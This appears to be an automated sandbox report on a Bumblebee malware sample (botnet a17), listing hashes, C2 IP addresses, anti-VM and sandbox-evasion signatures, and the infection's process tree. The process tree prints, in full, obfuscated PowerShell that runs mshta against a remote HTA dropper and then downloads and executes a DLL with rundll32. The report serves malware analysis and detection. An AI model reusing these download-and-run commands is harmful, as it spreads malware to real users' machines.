Overview

overview

10

Static

static

8e4fdc6db3...88.zip

windows7_x64

10

8e4fdc6db3...88.zip

windows10-2004_x64

10

Analysis

  • max time kernel
    95s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    18/06/2022, 03:26

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    8e4fdc6db367e299844c890efda88425da66e7f6247b11e89a0eba7fd7c57588.zip

  • Size

    3.1MB

  • MD5

    a515d83b2794491048040a28d85fe75d

  • SHA1

    fddb57bedf443d63f57d39e8dc0f07c9c520f8e2

  • SHA256

    8e4fdc6db367e299844c890efda88425da66e7f6247b11e89a0eba7fd7c57588

  • SHA512

    f684bea03072dfc1c9cfb44ca5c63bbccb0a897d0b4ed59f0fcf4005eaa901d1143aca68b77544e748526a346879ecb0d988469ef3bac6bef7219aa14bc550b7

Score
10/10
bumblebeea17evasiontrojan

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://pidipurev.com/a1799.hta

Extracted

Family

bumblebee

Botnet

a17

C2

220.111.119.123:476

90.12.112.169:180

146.70.124.116:443

47.27.63.45:115

77.45.24.148:444

11.1.201.27:344

224.200.37.92:481

103.175.16.38:443

188.8.220.88:269

12.202.229.195:440

41.56.181.200:486

173.171.60.50:394

5.152.80.211:121

88.158.143.245:189

57.242.85.233:131

30.205.76.70:490

45.138.172.246:443

213.226.100.95:443

46.44.240.53:361

151.75.118.144:368
rc4.plain

Signatures

  • BumbleBee

    BumbleBee is a webshell malware written in C++.

    trojanbumblebee
  • Enumerates VirtualBox registry keys 2 TTPs 5 IoCs
    evasion
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
    evasion
  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
    evasion
  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 3 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    evasion
  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\Explorer.exe
    C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\8e4fdc6db367e299844c890efda88425da66e7f6247b11e89a0eba7fd7c57588.zip
    1⤵
      PID:1596
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:3204
      • C:\Program Files\7-Zip\7zG.exe
        "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\8e4fdc6db367e299844c890efda88425da66e7f6247b11e89a0eba7fd7c57588\" -spe -an -ai#7zMap29216:208:7zEvent16926
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:3188
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $uVOFxPZI = [convert]::FromBase64String('enZr');$SvjOMbNF = [convert]::FromBase64String('XkBbR1ITW0dHQ0AJHBxDWldaQ0ZBVkUdUFxeHFICBAoKHVtHUg==');$OFVQWJMp = -join($uVOFxPZI | % {[char] ($_ -bxor 0x33)});$ZwhCtgVk = -join ($SvjOMbNF | % { [char] ($_ -bxor 0x33)});sal idMJYXuL $OFVQWJMp;idMJYXuL $ZwhCtgVk
        1⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:836
        • C:\Windows\system32\mshta.exe
          "C:\Windows\system32\mshta.exe" https://pidipurev.com/a1799.hta
          2⤵
          • Blocklisted process makes network request
          • Checks computer location settings
          • Modifies system certificate store
          • Suspicious use of WriteProcessMemory
          PID:864
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function cWJskuQlbOmpMA($ukeBbVmYNH, $EFucjtI){[IO.File]::WriteAllBytes($ukeBbVmYNH, $EFucjtI)};function zyZFKJmgHX($ukeBbVmYNH){if($ukeBbVmYNH.EndsWith((tXhPzTmXMFNFufDI @(68534,68588,68596,68596))) -eq $True){Start-Process (tXhPzTmXMFNFufDI @(rundll32.exe $ukeBbVmYNH ,TSErsNqyhR ))}elseif($ukeBbVmYNH.EndsWith((tXhPzTmXMFNFufDI @(68534,68600,68603,68537))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $ukeBbVmYNH}else{Start-Process $ukeBbVmYNH}};function kpcQqRGkdksJXcLvOm($cWJskuQlbOmpMA){$jXeMAsDGusrM=(tXhPzTmXMFNFufDI @(68560,68593,68588,68588,68589,68598));$PlebPQOXHehbVKBBhSo=(Get-ChildItem $cWJskuQlbOmpMA -Force);$PlebPQOXHehbVKBBhSo.Attributes=$PlebPQOXHehbVKBBhSo.Attributes -bor ([IO.FileAttributes]$jXeMAsDGusrM).value__};function CnfznBhFm($qmukbsVTysBgrFlHF){$XovuEuCBHyBHjrpc = New-Object (tXhPzTmXMFNFufDI @(68566,68589,68604,68534,68575,68589,68586,68555,68596,68593,68589,68598,68604));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$EFucjtI = $XovuEuCBHyBHjrpc.DownloadData($qmukbsVTysBgrFlHF);return $EFucjtI};function tXhPzTmXMFNFufDI($cIhrmkNsmwm){$CcKhtridtJs=68488;$mssiUtTLO=$Null;foreach($AMEOxEPSnbDIIHAZ in $cIhrmkNsmwm){$mssiUtTLO+=[char]($AMEOxEPSnbDIIHAZ-$CcKhtridtJs)};return $mssiUtTLO};function wRHQAOwSkVoz(){$DQTYahmqYv = $env:AppData + '\';;$bCCPiHWusHeO = $DQTYahmqYv + '';If(Test-Path -Path $bCCPiHWusHeO){Invoke-Item $bCCPiHWusHeO;}Else{ $eSzamRIZLBTJ = CnfznBhFm (tXhPzTmXMFNFufDI @(68592,68604,68604,68600,68603,68546,68535,68535));cWJskuQlbOmpMA $bCCPiHWusHeO $eSzamRIZLBTJ;Invoke-Item $bCCPiHWusHeO;}$CRGBhJNKWPuzGc = $DQTYahmqYv + 'a17_cr99.dll'; if (Test-Path -Path $CRGBhJNKWPuzGc){zyZFKJmgHX $CRGBhJNKWPuzGc;}Else{ $FKoBPFKAjO = CnfznBhFm (tXhPzTmXMFNFufDI @(68592,68604,68604,68600,68603,68546,68535,68535,68600,68593,68588,68593,68600,68605,68602,68589,68606,68534,68587,68599,68597,68535,68585,68537,68543,68583,68587,68602,68545,68545,68534,68588,68596,68596));cWJskuQlbOmpMA $CRGBhJNKWPuzGc $FKoBPFKAjO;zyZFKJmgHX $CRGBhJNKWPuzGc;};kpcQqRGkdksJXcLvOm $CRGBhJNKWPuzGc;;;;;}wRHQAOwSkVoz;
            3⤵
            • Blocklisted process makes network request
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:396
            • C:\Windows\system32\rundll32.exe
              "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a17_cr99.dll TSErsNqyhR
              4⤵
              • Enumerates VirtualBox registry keys
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Looks for VirtualBox Guest Additions in registry
              • Checks BIOS information in registry
              • Identifies Wine through registry keys
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              PID:3996

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        2f57fde6b33e89a63cf0dfdd6e60a351

        SHA1

        445bf1b07223a04f8a159581a3d37d630273010f

        SHA256

        3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

        SHA512

        42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        e1fb26de120faadab3c093b78644964f

        SHA1

        bb587dd3b1ad8384b6d612bc4bb806f41562982f

        SHA256

        e1ce351162cae7e8671f980192da54b8440d309985687d8eef56fec0b3180a85

        SHA512

        6e4d18e9506e72f90aea0c93d190b9817566bbbfa2409c1ae6ca98c2b81f8a2bd4204270ce951444d49dfc85c9f1b913952afe6b8fceea918dd97006cf322518

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\8e4fdc6db367e299844c890efda88425da66e7f6247b11e89a0eba7fd7c57588\PRD.lnk
        Filesize

        1.9MB

        MD5

        6d3b37ea0e22cb04d9227dee552663f4

        SHA1

        2e1d39395fc36693d2abff8709db4261909e7cda

        SHA256

        9c4cfd85af061badf6bab38ace88be3a6a21e64fd99571eee8e93fed745261f9

        SHA512

        3089cecd1b4fb2c843aec61f1cb5a28f8c1052c5ff7296301a6702050b0916b847f199bf78134d88bca1797eabfa70721a9d26d425bc50053018954e290302c7

        Download Submit

      • C:\Users\Admin\AppData\Roaming\a17_cr99.dll
        Filesize

        1.6MB

        MD5

        f72e0a5bc11cf1b2f5446c27e98049dd

        SHA1

        ca695374c77d62cdbd87ef88f3ad646b9e799614

        SHA256

        3d62ffeaa997dd7e6bdfa072e71a47241960524b31b64a168ca59d69ff680437

        SHA512

        ea23b03ed49f4e31e713845357e22f896f07ad5637df71b9e97976cb1c235beb3f30579697a156b477f3b38edc6bc133fe03b5c98754dc102575a7a4679f3825

        Download Submit

      • C:\Users\Admin\AppData\Roaming\a17_cr99.dll
        Filesize

        1.6MB

        MD5

        f72e0a5bc11cf1b2f5446c27e98049dd

        SHA1

        ca695374c77d62cdbd87ef88f3ad646b9e799614

        SHA256

        3d62ffeaa997dd7e6bdfa072e71a47241960524b31b64a168ca59d69ff680437

        SHA512

        ea23b03ed49f4e31e713845357e22f896f07ad5637df71b9e97976cb1c235beb3f30579697a156b477f3b38edc6bc133fe03b5c98754dc102575a7a4679f3825

        Download Submit

      • memory/396-138-0x00007FFB8C760000-0x00007FFB8D221000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/396-142-0x00007FFB8C760000-0x00007FFB8D221000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/836-134-0x00007FFB8CEC0000-0x00007FFB8D981000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/836-131-0x0000020778F50000-0x0000020778F72000-memory.dmp

        Filesize

        136KB

        Download

      • memory/3996-143-0x000001D5445E0000-0x000001D5446F7000-memory.dmp

        Filesize

        1.1MB

        Download

      • memory/3996-144-0x00007FFBAF4E0000-0x00007FFBAF4F0000-memory.dmp

        Filesize

        64KB

        Download